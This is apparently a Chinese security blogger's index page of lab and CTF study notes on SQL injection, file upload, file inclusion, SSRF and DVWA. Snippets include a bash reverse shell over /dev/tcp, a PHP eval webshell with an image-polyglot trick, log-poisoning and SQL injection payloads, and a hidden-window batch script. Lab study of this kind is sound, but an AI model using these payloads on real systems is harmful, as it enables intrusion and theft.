网络安全
LztCode
学习一开始就是模仿的过程。
网络空间安全学习者
展开
-
Mac M2芯片Arm64安卓模拟器7.0安装xposed
Mac M2芯片Arm64安卓模拟器7.0安装xposed原创 2022-09-28 03:23:17 · 5932 阅读 · 6 评论 -
buuctf [第三章 web进阶]Python里的SSRF 1
我看很多wp都没有提到这个绕过方式,分享一下1、直接访问node4.buuoj.cn:81/?url=http://127.0.0.1:8000/api/internal/secret2、使用0代替127.0.0.1绕过,访问node4.buuoj.cn:81/?url=http://0:8000/api/internal/secret3、得到flag...原创 2022-03-29 12:30:56 · 4002 阅读 · 0 评论 -
隐藏黑窗口的BAT脚本
最后一行换成你要执行的命令@echo offif "%1" == "h" goto beginmshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit:beginREMjava -jar .\Stegsolve.jar人无远虑,必有近忧原创 2021-10-06 16:07:04 · 1931 阅读 · 0 评论 -
selenium一键安装
vim selenium.sh粘贴 :wq保存 sudo sh selenium.sh运行wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.debsudo dpkg -i --force-depends google-chrome-stable_current_amd64.debLATEST=(wget−q−O−http://chromedriver.storage.googleapis.com/LAT原创 2021-02-04 10:12:09 · 144 阅读 · 0 评论 -
WEBSHELL&XSS
WebShellwebshell就是以asp、 php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。隐蔽性强 功能强大 穿越防火墙 无系统日志大马功能比较齐全的Webshell,由脚本语言编写,提供了文件操作、数据库管理、执行命令等功能,一般代码量比较大原创 2020-11-24 21:58:58 · 702 阅读 · 1 评论 -
文件包含&PHP伪协议
文件包含漏洞的常见利用思路:URL传一句话进去(bp抓包),文件包含日志文件执行http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo();//要使用php里面的功能就必须传一个参数进去PHP伪协议http://127.0.0.1/include.php?file=file://c:/Windows/win.ini路径必须是绝对路径php://filter读写文件(查账号密码)http://1原创 2020-11-24 21:53:42 · 168 阅读 · 1 评论 -
信息收集&命令注入&反序列化(dvwa)
信息收集zoomeye 钟馗之眼shodan 撒旦fofa采用hash搜索标签页上面的小图片http.favicon.hash:-842852785命令注入dvwa的命令执行漏洞利用测试是否存在命令注入127.0.0.1 | winver反弹shellkali监听7777端口 nc -lvp 7777注:测试环境Ubuntu虚拟机dvwa命令注入输入 ;bash -i >& /dev/tcp/kali的ip地址/7777 0>&1反序列化(对象注入)原创 2020-11-24 21:49:53 · 688 阅读 · 0 评论 -
upload-labs 速通 less01-less21
非正常速通 >_< 懒使用的标准一句话,<?php @eval($_REQUEST[666])?>使用的标准图片马,copy 1.php/b + 1.png/b 1.jpg使用标准的中国蚁剑,http://127.0.0.1/upload-labs/include.php?file=upload/1.jpg使用的标准连接密码,666使用的标准编码设置,utf-8使用的标准连接类型,php使用的标准编码器,defaultless-01. 图片马less-02. 图片马原创 2020-11-06 22:18:44 · 243 阅读 · 0 评论 -
sql注入--sqli-labs-less1~9
常规注入127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),3–+less1字符型联合注入127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 union select 1,version(),3–+less2数字型联合注入127.0.0.1/sqlilabs/Less-3/?id=1’) and 1=2 union select 1,version(),3–+less3字符型联合注入127.原创 2020-10-23 22:38:36 · 91 阅读 · 0 评论 -
sqlmap的基本使用办法
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持13种数据库。sqlmap工作流程http://127.0.0.1/index.php?a=1&b=2&c=3当给sqNmap这么一个url的时候,它会:1.检测网站是否能够访问2.检测是否有waf3.判断可注入的参数sqlmap目录介绍doc目录,包含sqlmap的简要说明,具体使用说明、作者信息等。extra目录,包含了sqlmap的额外功能,例如发出声响、运行c原创 2020-10-20 12:02:48 · 427 阅读 · 0 评论 -
sqli-labs 盲注命令
sql盲注sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码查版本。?id=1’and left(version(),1)=5–+查库名。?id=1’and ascii(substr(database(),1,1))=115–+查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+查表长。?id=1’and length(subst原创 2020-10-16 12:13:08 · 267 阅读 · 0 评论 -
渗透测试Day04 -NTFS权限 -文件共享 -PE破解密码
学习目标:渗透测试Day04熟练运用用户管理和远程管理熟悉NTFS文件权限学习内容:渗透测试基础什么叫文件系统?分区的存储格式(方式)windows FAT/NTFSlinux EXT存储越大的文件格式化时选择分配单元大小越大越好,碎小文件选择分配单元大小越小越好。原理:每个簇只能被一个文件用,簇越小存储利用率越高,指针越多,打开文件越慢;簇越大指针越少,打开文件越快,存储利用率较低NTSF才具有访问控制列表(设置权限)的功能,FAT无NTFS文件系统的优点有哪些原创 2020-10-05 19:04:37 · 153 阅读 · 0 评论 -
渗透测试Day03 -DOS命令 -用户管理 -远程管理 -破解windows密码
学习目标:渗透测试Day03熟练运用DOS命令管理用户熟悉图形化用户管理学习内容:渗透测试基础SID是唯一随机的安全标识符< 系统ID+用户ID组成 -最后几位是UID>UID是用户ID,windows系统管理员administrator默认UID是500,普通用户UID从1000开始,Linux系统管理员root默认UID是0账号密码的SAM文件路径在哪里?C:\Windows\System32\config\SAMSAM使用Hash不可逆算法加密,只能暴力破解或撞库原创 2020-10-05 04:12:13 · 401 阅读 · 0 评论 -
渗透测试Day02 -DOS命令 -BAT批处理
学习目标:标题渗透测试Day02熟练运用DOS命令熟悉BAT批处理脚本编写学习内容:提示:这里可以添加要学的内容@echo off 屏蔽回显(不显示执行过程)echo 打印字符串pause 暂停一下学习时间:提示:这里可以添加计划学习的时间例如:Two days学习产出:还行吧1、 技术笔记 2 遍2、 CSDN 技术博客 3 篇3、 学习的 vlog 视频 1 个...原创 2020-10-04 22:37:58 · 467 阅读 · 0 评论 -
渗透测试Day01 -VM虚拟机 -IP地址 -DOS命令
渗透测试Day01 命令行mstsc进行远程连接 services.msc打开服务管理窗口 gpedit.msc组策略 ip地址只能在同网段下通信,ip地址由网段+主机位组成 为什么分网段,因为同网段设备过多会瘫痪,广播量过大 子网掩码255对应网段的网络位,0对应主机位 一个ip地址必须配套一个子网掩码 0(网段的总称)和255(广播地址)不能使用 255.255.255.255全局广播地址 主机位不能全为0也不能全为255就是可用ip地址范围 ip地原创 2020-10-04 00:56:18 · 283 阅读 · 0 评论 -
kali虚拟机配置dhcp--桥接模式
kali虚拟机配置dhcp打开vm,编辑->虚拟网络编辑器->还原网络设置打开kali,开始配置dhcp试过编辑vi /etc/network/interfaces文件,没什么效果网卡移除再重新添加,选择桥接(不复制物理机连接状态),确定双击kali网络的小图标选择ipv4 setting,选择dhcp成功了。...原创 2020-09-28 23:49:59 · 4631 阅读 · 3 评论 -
Sqli_Edited_Version安装,完美解决php7.0+版本问题
新手上路,sqli安装Github链接https://github.com/Rinkish/Sqli_Edited_Version解压Sqli_Edited_Version先解压到phpstudy的www目录下,phpstudy教程很多,这里不介绍了。修改Sqli配置文件,路径在 WWW\sqlilabs\sql-connections\db-creds.inc,将配置文件用记事本或者Sublime打开db-creds.inc修改你的用户名和密码。然后浏览器访问sqli,选择第二项rese原创 2020-09-27 12:34:06 · 415 阅读 · 0 评论